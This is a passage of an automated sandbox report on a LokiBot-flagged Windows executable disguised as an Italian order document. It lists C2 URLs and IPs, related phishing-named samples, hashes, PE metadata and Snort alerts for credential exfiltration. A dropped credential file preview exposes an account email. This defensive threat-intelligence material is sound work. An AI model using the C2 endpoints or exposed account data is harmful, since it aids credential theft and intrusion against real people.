                                              Nr_ SOFIA_587646211152021.exeGet hashmaliciousBrowse
                                              • farmanat.ro/arman30/five/fre.php
                                              SOFIA_BG PROJECT Nr_534427355.exeGet hashmaliciousBrowse
                                              • farmanat.ro/farm/five/fre.php
                                              Arimar International Spa Ordine Urgente Nr. 67754#11_3_2021_pdf.exeGet hashmaliciousBrowse
                                              • farmanat.ro/farm/five/fre.php
                                              SecuriteInfo.com.Trojan.GenericKD.47258968.7621.exeGet hashmaliciousBrowse
                                              • farmanat.ro/farm/five/fre.php
                                              PO_W4420211025#BULGARIA SAINT GOBAIN.exeGet hashmaliciousBrowse
                                              • farmanat.ro/farm/five/fre.php
                                              PO_W4420211025#BULGARIA SAINT GOBAIN.exeGet hashmaliciousBrowse
                                              • farmanat.ro/farm/five/fre.php
                                              Progetto Plastisavio S.p.A. 19_10_2021_pdf.exeGet hashmaliciousBrowse
                                              • farmanat.ro/farm/five/fre.php
                                              Schenker Italiana S.p.A. CW305.exeGet hashmaliciousBrowse
                                              • farmanat.ro/farm/five/fre.php

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              farmanat.roATTACHMENT 6637268#Hydro tech BG_pdf.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              ARRIVAL NOTICE DHL Code Nr 4622256860_pdf.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Richiesta di quotazione ISCOTRANS SPA Nr.5653.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Nr_ SOFIA_587646211152021.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              SOFIA_BG PROJECT Nr_534427355.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Arimar International Spa Ordine Urgente Nr. 67754#11_3_2021_pdf.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              SecuriteInfo.com.Trojan.GenericKD.47258968.7621.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              PO_W4420211025#BULGARIA SAINT GOBAIN.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              PO_W4420211025#BULGARIA SAINT GOBAIN.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Progetto Plastisavio S.p.A. 19_10_2021_pdf.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Schenker Italiana S.p.A. CW305.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              SecuriteInfo.com.__vbaHresultCheckObj.9268.exeGet hashmaliciousBrowse
                                              • 176.223.209.128

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              AfrihostZAoQANZnrt9dGet hashmaliciousBrowse
                                              • 169.35.135.240
                                              Akiru.arm7Get hashmaliciousBrowse
                                              • 169.66.132.25
                                              Akiru.armGet hashmaliciousBrowse
                                              • 169.121.9.247
                                              HLiQSIwlY7Get hashmaliciousBrowse
                                              • 169.79.178.207
                                              aZsszSGIEVGet hashmaliciousBrowse
                                              • 169.127.19.203
                                              2Mxp7Z86k3Get hashmaliciousBrowse
                                              • 169.222.34.97
                                              sora.x86Get hashmaliciousBrowse
                                              • 169.74.42.79
                                              c0az1l4js3001lsk4xd9n.x86-20211124-0850Get hashmaliciousBrowse
                                              • 169.166.190.64
                                              x86_64-20211124-0649Get hashmaliciousBrowse
                                              • 169.74.152.242
                                              arm-20211124-0649Get hashmaliciousBrowse
                                              • 169.168.89.229
                                              sora.arm-20211123-2050Get hashmaliciousBrowse
                                              • 169.222.83.73
                                              zxIlLJKaukGet hashmaliciousBrowse
                                              • 169.114.115.195
                                              6PZ6S2YGPBGet hashmaliciousBrowse
                                              • 169.164.169.154
                                              DkTfOvsiCRGet hashmaliciousBrowse
                                              • 169.82.147.51
                                              RpcSecurity.armGet hashmaliciousBrowse
                                              • 169.184.22.186
                                              KKveTTgaAAsecNNaaaa.x86-20211122-0650Get hashmaliciousBrowse
                                              • 169.107.15.33
                                              eh.x86Get hashmaliciousBrowse
                                              • 165.255.192.210
                                              g2ZhDilVO3Get hashmaliciousBrowse
                                              • 169.225.110.154
                                              TikNgaeW5GGet hashmaliciousBrowse
                                              • 169.66.107.25
                                              Hilix.armGet hashmaliciousBrowse
                                              • 169.76.1.149
                                              ROHOSTWAY-ASROATTACHMENT 6637268#Hydro tech BG_pdf.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              ARRIVAL NOTICE DHL Code Nr 4622256860_pdf.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Richiesta di quotazione ISCOTRANS SPA Nr.5653.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Nr_ SOFIA_587646211152021.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              SOFIA_BG PROJECT Nr_534427355.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Arimar International Spa Ordine Urgente Nr. 67754#11_3_2021_pdf.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              SecuriteInfo.com.Trojan.GenericKD.47258968.7621.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              PO_W4420211025#BULGARIA SAINT GOBAIN.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              PO_W4420211025#BULGARIA SAINT GOBAIN.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Progetto Plastisavio S.p.A. 19_10_2021_pdf.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Schenker Italiana S.p.A. CW305.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              SecuriteInfo.com.__vbaHresultCheckObj.9268.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              118937279-112134-sanlccjavap0003-60.exeGet hashmaliciousBrowse
                                              • 176.223.208.10
                                              171021434-045230-sanlccjavap0003-10004.exeGet hashmaliciousBrowse
                                              • 176.223.208.10
                                              6fbb325e_by_Libranalysis.exeGet hashmaliciousBrowse
                                              • 176.223.208.10
                                              PE001163862782-11737929013-93891812PDF.exeGet hashmaliciousBrowse
                                              • 176.223.208.10
                                              Em anexo esta a Fatura Proforma.exeGet hashmaliciousBrowse
                                              • 176.223.209.5
                                              69P.O 2315_PDF.exeGet hashmaliciousBrowse
                                              • 84.40.5.143
                                              40INVOICE BTS_Pdf.exeGet hashmaliciousBrowse
                                              • 84.40.5.143
                                              17Bill of lading Status_pdf.exeGet hashmaliciousBrowse
                                              • 84.40.5.143

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              37f463bf4616ecd445d4a1937da06e19mal1.htmlGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              5A15ECE1649A5EF54B70B95D9D413BAD068B8C1C932E2.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              DOC5629.htmGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              Racun je u prilogu.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              exe.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              INF-BRdocsx.NDVDELDKRS.msiGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              2GEg45PlG9.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              cJ2wN3RKmh.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              J73PTzDghy.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              fkYZ7hyvnD.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              xzmHphquAP.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              R0xLHA2mT5.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              Rats4dIOmA.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              XP-SN-7843884.htmGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              XP-SN-8324655.htmGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              new-1834138397.xlsGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              1.htmGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              FACTURAS.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              new-1179494065.xlsGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              Arrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                                              • 197.242.150.64

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Credentials\93CE54EBD72B5E2187F75E8118A14612_dec
                                              Process:C:\Windows\System32\lsass.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):3656
                                              Entropy (8bit):7.0471426164335735
                                              Encrypted:false
                                              SSDEEP:48:UOt6arrbUSpRRAr24LrPMJvPdkbr0Cn4mroYbkM6CRrlWycl9rfkTJNrrN8euJMQ:UO8abFpRRG24fgPd6dD2GMsl53zqLA8
                                              MD5:DF46EAA3E0822E1F26163A47DD2EBC88
                                              SHA1:74C5CD5E0A656E2B17567486D8893A41D6FC1837
                                              SHA-256:2DB1C00E04388BD8BDD7263D10200FB52F7F34078733B4B722BF142B0D9E7E19
                                              SHA-512:B316793DCD4B612D09E34DF00E27DCAFA0E6452913B1DC7A43D5483C259DADA9FA11E32F6FA42D32A460EE221D25A82B2888C02B0060E7BBF6810A0229A118E1
                                              Malicious:false
                                              Reputation:low
                                              Preview: 0...H.................0.............................L.e.g.a.c.y.G.e.n.e.r.i.c.:.t.a.r.g.e.t.=.M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.u.s.e.r.=.s.h.a.h.a.k...s.h.a.p.i.r.a.@.o.u.t.l.o.o.k...c.o.m.......(...P.e.r.s.i.s.t.e.d.C.r.e.d.e.n.t.i.a.l.......6...s.h.a.h.a.k...s.h.a.p.i.r.a.@.o.u.t.l.o.o.k...c.o.m...........D...M.i.c.r.o.s.o.f.t._.W.i.n.d.o.w.s.L.i.v.e.:.a.u.t.h.s.t.a.t.e.:.0...................z..O........$...I.AP...i&...........f...... ....}3..+....i.a...-..*..JEj...d<~............ ........K%..D.c<.P............j. ...zp.@..e.s.Wes1J..B..G.U[....0O%9l...U..F..vO..<.......<..sn.8j3*...4?.Be.i.BqM.q^..|x.....D..s).^o....[,.....D...M.i.c.r.o.s.o.f.t._.W.i.n.d.o.w.s.L.i.v.e.:.a.u.t.h.s.t.a.t.e.:.1.......1.YY..VRnE...%...m....Fa...?...2KC...Z.w...`+.&..\^.....[...*6M0.V.9....N..S..|.....,....;...i.v]y....;...E.R..I]....C.....z..%.....?...].5..p..<.... .....>....bC.|...|..B..Q0_f).^.k.Nt#e..[...iv+G.x.T.z.~...S.....t..`.....m....\.iq........D...M.i.c.r.o.s.o.
                                              C:\Users\user\AppData\Local\Temp\~DFBA8B24485FEA2BF0.TMP
                                              Process:C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):16384
                                              Entropy (8bit):1.5460794479699351
                                              Encrypted:false
                                              SSDEEP:96:kOtJyg4D7OKBqQOtJyg4D1DDPwYDPXxJXf6nZV4XoB:1KD7OKAJKD1DDPwYDPXxJXf6nZV4XoB
                                              MD5:A10173F2BC7809BD9C218B204F91B9B5
                                              SHA1:CCC33C4FF5908D771A921E81FA6DEC9E83BF9399
                                              SHA-256:9D569DF219A76092E36A090729EF451275255D21A7B7FA9BEEA8431DF88906D8
                                              SHA-512:F2FB87D14882D23D9F49F4AE31D179CE083C0D7F2C87755C68600CDBB8A48E06E02DBFD0FCF42BB7611590FDF03EB4FDA0B5FBB530A1DB4AAB5487099A495FDB
                                              Malicious:false
                                              Reputation:low
                                              Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.hdb
                                              Process:C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              File Type:ISO-8859 text, with no line terminators
                                              Category:dropped
                                              Size (bytes):4
                                              Entropy (8bit):2.0
                                              Encrypted:false
                                              SSDEEP:3:7:7
                                              MD5:4F1717C9B5ACF6604D800FE07A8D320F
                                              SHA1:151524FA23C0F30AB06C0DA0BEAFDB77ABAA3739
                                              SHA-256:B2B5DAEAC1A532BA9D1086A6CFB21F7CD9381D4FFAFB12274E5248D108F0BDC6
                                              SHA-512:DA07F4DEB58DFBD694F4A7D2D54D154B78E507EC6477F1DB0CA6922F25E5E3FA0C0FB6FC78D1FA584FC883754D3FCA9F567207E61CE8C3851C79D5AB42C2A258
                                              Malicious:false
                                              Reputation:low
                                              Preview: .@h.
                                              C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.lck
                                              Process:C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview: 1
                                              C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb
                                              Process:C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):47
                                              Entropy (8bit):1.1262763721961973
                                              Encrypted:false
                                              SSDEEP:3:/lSllIEXln:AWE1
                                              MD5:D69FB7CE74DAC48982B69816C3772E4E
                                              SHA1:B1C04CDB2567DC2B50D903B0E1D0D3211191E065
                                              SHA-256:8CC6CA5CA4D0FA03842A60D90A6141F0B8D64969E830FC899DBA60ACB4905396
                                              SHA-512:7E4EC58DA8335E43A4542E0F6E05FA2D15393E83634BE973AA3E758A870577BA0BA136F6E831907C4B30D587B8E6EEAFA2A4B8142F49714101BA50ECC294DDB0
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: ........................................user.

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):6.174630404591659
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.15%
                                              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:ORDINE + DDT A.M.F SpA.exe
                                              File size:164928
                                              MD5:f5423b7a89876044078cbb68db883af8
                                              SHA1:24c550c47d26090f298fea030d7fb890c94737a5
                                              SHA256:68a315123349444d30fed12643a7be20eb003531a4b95d0db800fb765449037d
                                              SHA512:a1e0da217c0a383878405f53b7318316d87fa7483831429ef50973a526bf160baa855ac2b7853dfe95b15265aee3bba9044ad04ee4319ab41cb2fdb1cd2cf166
                                              SSDEEP:3072:9cqN5FpupBqUudn4Qw6cOOxQnLC6hpA7VHACd:xN5mpBHAYxQnLn4D
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L......O................. ...`......@........0....@

                                              File Icon

                                              Icon Hash:e5c1e079b0dcdc3c

                                              Static PE Info

                                              General

                                              Entrypoint:0x401640
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                              DLL Characteristics:
                                              Time Stamp:0x4FF98A07 [Sun Jul 8 13:24:23 2012 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:90425c3cfb1918f16a4ffb8047a25e88

                                              Authenticode Signature

                                              Signature Valid:false
                                              Signature Issuer:E=Halvmilitr5@Pasan.Out, CN=yeara, OU=Hnisses, O=Frstestyrmndenes, L=langhalms, S=Targon, C=TH
                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                              Error Number:-2146762487
                                              Not Before, Not After
                                              • 25/11/2021 06:31:27 25/11/2022 06:31:27
                                              Subject Chain
                                              • E=Halvmilitr5@Pasan.Out, CN=yeara, OU=Hnisses, O=Frstestyrmndenes, L=langhalms, S=Targon, C=TH
                                              Version:3
                                              Thumbprint MD5:1675B0681F6E08F88C72FD3302E50FD9
                                              Thumbprint SHA-1:DDEB96699987B30C7A4E263EC2B1CE4BED20032D
                                              Thumbprint SHA-256:490EABAB012CB43983C62C20A02D579B84FABA9ADF4734E32E4330690D5139D1
                                              Serial:00

                                              Entrypoint Preview

                                              Instruction
                                              push 004016F4h
                                              call 00007F3B60A66FF3h
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              xor byte ptr [eax], al
                                              add byte ptr [eax], al
                                              inc eax
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [edi-6A393297h], cl
                                              pop ss
                                              mov dword ptr [ecx-75h], ecx
                                              or ecx, dword ptr [esi-40h]
                                              dec esi
                                              out dx, al
                                              iretd
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add dword ptr [eax], eax
                                              add byte ptr [eax], al
                                              inc edx
                                              add byte ptr [esi], al
                                              push eax
                                              add dword ptr [ecx], 46h
                                              popad
                                              je 00007F3B60A67076h
                                              insb
                                              imul esp, dword ptr [edi+65h], 1C000073h
                                              insb
                                              hlt
                                              add al, byte ptr [eax]
                                              add byte ptr [eax], al
                                              add byte ptr [esi], al
                                              add byte ptr [eax], al
                                              add al, ah
                                              aaa
                                              inc eax
                                              add byte ptr [edi], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax+ebp+40h], ch
                                              add byte ptr [edi], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax+ebp], dl
                                              inc eax
                                              add byte ptr [edi], al
                                              add byte ptr [eax], al
                                              add al, al
                                              daa
                                              inc eax
                                              add byte ptr [ecx], al
                                              add byte ptr [eax+eax], al
                                              inc eax
                                              and eax, dword ptr [eax+00h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x226f40x28.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x260000x22a4.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x270000x1440
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x20
                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x118.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x21bcc0x22000False0.385268267463data6.40485948077IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .data0x230000x20b40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .rsrc0x260000x22a40x3000False0.194580078125data3.74537367217IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              CUSTOM0x27e840x420ASCII text, with CRLF line terminatorsEnglishUnited States
                                              CUSTOM0x27a480x43cASCII text, with CRLF line terminatorsEnglishUnited States
                                              CUSTOM0x276c60x382ASCII text, with CRLF line terminatorsEnglishUnited States
                                              RT_ICON0x2759e0x128GLS_BINARY_LSB_FIRST
                                              RT_ICON0x270360x568GLS_BINARY_LSB_FIRST
                                              RT_ICON0x26d4e0x2e8data
                                              RT_ICON0x264a60x8a8data
                                              RT_GROUP_ICON0x264680x3edata
                                              RT_VERSION0x262300x238dataChineseTaiwan

                                              Imports

                                              DLLImport
                                              MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                              Version Infos

                                              DescriptionData
                                              Translation0x0404 0x04b0
                                              InternalNameHYDROCHELIDON
                                              FileVersion1.00
                                              ProductNameDaisy chain
                                              ProductVersion1.00
                                              FileDescriptionDaisy chain
                                              OriginalFilenameHYDROCHELIDON.exe

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              ChineseTaiwan

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              11/25/21-10:47:51.302644UDP254DNS SPOOF query response with TTL of 1 min. and no authority53622421.1.1.1192.168.11.20
                                              11/25/21-10:47:51.432888UDP254DNS SPOOF query response with TTL of 1 min. and no authority53622429.9.9.9192.168.11.20
                                              11/25/21-10:47:51.433091ICMP402ICMP Destination Unreachable Port Unreachable192.168.11.209.9.9.9
                                              11/25/21-10:47:54.204528TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14981780192.168.11.20176.223.209.128
                                              11/25/21-10:47:54.204528TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.11.20176.223.209.128
                                              11/25/21-10:47:54.204528TCP2025381ET TROJAN LokiBot Checkin4981780192.168.11.20176.223.209.128
                                              11/25/21-10:47:54.204528TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24981780192.168.11.20176.223.209.128
                                              11/25/21-10:48:00.994992TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.11.20176.223.209.128
                                              11/25/21-10:48:00.994992TCP2025381ET TROJAN LokiBot Checkin4982180192.168.11.20176.223.209.128
                                              11/25/21-10:48:01.719256TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.11.20176.223.209.128
                                              11/25/21-10:48:01.719256TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.11.20176.223.209.128
                                              11/25/21-10:48:01.719256TCP2025381ET TROJAN LokiBot Checkin4982280192.168.11.20176.223.209.128
                                              11/25/21-10:48:01.719256TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982280192.168.11.20176.223.209.128
                                              11/25/21-10:48:02.549129TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.11.20176.223.209.128
                                              11/25/21-10:48:02.549129TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.11.20176.223.209.128
                                              11/25/21-10:48:02.549129TCP2025381ET TROJAN LokiBot Checkin4982380192.168.11.20176.223.209.128
                                              11/25/21-10:48:02.549129TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.11.20176.223.209.128
                                              11/25/21-10:48:03.269523TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.11.20176.223.209.128
                                              11/25/21-10:48:03.269523TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.11.20176.223.209.128
                                              11/25/21-10:48:03.269523TCP2025381ET TROJAN LokiBot Checkin4982480192.168.11.20176.223.209.128
                                              11/25/21-10:48:03.269523TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982480192.168.11.20176.223.209.128
                                              11/25/21-10:48:03.921018TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.11.20176.223.209.128
                                              11/25/21-10:48:03.921018TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.11.20176.223.209.128
                                              11/25/21-10:48:03.921018TCP2025381ET TROJAN LokiBot Checkin4982580192.168.11.20176.223.209.128
                                              11/25/21-10:48:03.921018TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982580192.168.11.20176.223.209.128
                                              11/25/21-10:48:04.640364TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.11.20176.223.209.128
                                              11/25/21-10:48:04.640364TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.11.20176.223.209.128
                                              11/25/21-10:48:04.640364TCP2025381ET TROJAN LokiBot Checkin4982680192.168.11.20176.223.209.128
                                              11/25/21-10:48:04.640364TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982680192.168.11.20176.223.209.128
                                              11/25/21-10:48:05.424332TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.11.20176.223.209.128
                                              11/25/21-10:48:05.424332TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.11.20176.223.209.128
                                              11/25/21-10:48:05.424332TCP2025381ET TROJAN LokiBot Checkin4982880192.168.11.20176.223.209.128
                                              11/25/21-10:48:05.424332TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982880192.168.11.20176.223.209.128
                                              11/25/21-10:48:06.230046TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.11.20176.223.209.128
                                              11/25/21-10:48:06.230046TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.11.20176.223.209.128
                                              11/25/21-10:48:06.230046TCP2025381ET TROJAN LokiBot Checkin4984480192.168.11.20176.223.209.128
                                              11/25/21-10:48:06.230046TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984480192.168.11.20176.223.209.128
                                              11/25/21-10:48:06.992097TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.11.20176.223.209.128
                                              11/25/21-10:48:06.992097TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.11.20176.223.209.128
                                              11/25/21-10:48:06.992097TCP2025381ET TROJAN LokiBot Checkin4984580192.168.11.20176.223.209.128
                                              11/25/21-10:48:06.992097TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.11.20176.223.209.128
                                              11/25/21-10:48:07.734356TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.11.20176.223.209.128
                                              11/25/21-10:48:07.734356TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.11.20176.223.209.128
                                              11/25/21-10:48:07.734356TCP2025381ET TROJAN LokiBot Checkin4984680192.168.11.20176.223.209.128
                                              11/25/21-10:48:07.734356TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984680192.168.11.20176.223.209.128
                                              11/25/21-10:48:08.418319TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984780192.168.11.20176.223.209.128
                                              11/25/21-10:48:08.418319TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984780192.168.11.20176.223.209.128
                                              11/25/21-10:48:08.418319TCP2025381ET TROJAN LokiBot Checkin4984780192.168.11.20176.223.209.128
                                              11/25/21-10:48:08.418319TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984780192.168.11.20176.223.209.128
                                              11/25/21-10:48:09.107461TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984880192.168.11.20176.223.209.128
                                              11/25/21-10:48:09.107461TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984880192.168.11.20176.223.209.128
                                              11/25/21-10:48:09.107461TCP2025381ET TROJAN LokiBot Checkin4984880192.168.11.20176.223.209.128
